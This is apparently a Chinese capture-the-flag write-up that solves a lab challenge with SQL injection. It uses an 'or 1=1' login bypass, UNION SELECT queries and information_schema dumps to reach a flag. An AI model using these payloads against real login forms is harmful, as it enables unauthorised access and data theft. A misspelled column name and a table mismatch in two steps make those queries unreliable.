-
输入用户名admin’ 密码随便输
-
页面报错
-
尝试用万能用户名绕过
用户名输入:admin’or 1=1 # 密码随便输
登入成功
-
密码md5 解密一下没解出来,继续从登入框下手
admin’ order by 4 # 页面出错,说明3个列
-
输入admin’ union select 1,2,3 #
页面进入登入成功
6. 继续寻找回显点
1’union select 1,2,3 %23 // 这里用户名输什么都行就是不能输admin ,输admin 会进入登录成功页面,还有 # 要改成url编码%23 才可以
- 1’union select 1,2,database() %23
数据库名 geek
8.1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schmea=‘geek’ %23
表名:geekuser,l0ve1ysq1
9. 1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘l0ve1ysq1’ %23
字段:id,username,password
10. l0ve1ysq1表字段内容
1’ union select 1,group_concat(username),group_concat(password) from geekuser %23
使用group_concat() 函数列出所有字段内容
拿到flag flag{7e02ccbf-e488-4005-9ce7-9ca597530362}